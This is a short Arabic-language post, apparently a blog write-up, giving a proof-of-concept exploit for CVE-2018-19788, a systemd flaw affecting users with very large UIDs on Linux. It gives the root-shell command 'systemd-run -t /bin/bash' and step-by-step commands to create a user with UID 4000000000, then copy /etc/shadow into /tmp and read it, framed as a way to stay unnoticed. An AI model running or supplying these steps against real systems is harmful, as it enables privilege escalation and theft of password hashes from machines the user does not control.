
استغلال CVE-2018-19788 بدون قذائف الجذر
CVE-2018-19788 هي ثغرة تسمح لأي مستخدم بمعرّف UID أكبر من INT_MAX (أي 4000000000) بتشغيل أي أمر systemctl على جهاز لينكس يعمل بـ systemd، مثل Ubuntu. (يوجد بالفعل مقال للحصول على شل جذر: هنا). الفرق الرئيسي بين هذا المقال ومقال الشل الجذر الكامل هو أن هذا يُنفَّذ بصلاحيات المستخدم نفسه بدلاً من مستخدم الجذر (في الأساس مجرد إثبات مفهوم PoC بصراحة)
للحصول على شل جذر، الأمر في غاية البساطة: تشغيل systemd-run -t /bin/bash، لكن إذا أردت البقاء بعيدًا عن الأنظار يمكنك تشغيل أوامر بسيطة للحصول على ملفات تتطلب صلاحيات مرتفعة دون الحاجة إلى طرفية. اتبع هذه الخطوات لفعل ذلك:
adduser --uid 4000000000 someusername
su someusername
systemd-run bash -c 'cat /etc/shadow > /tmp/results_poc.txt'
/tmp:
cat /tmp/results_poc.txt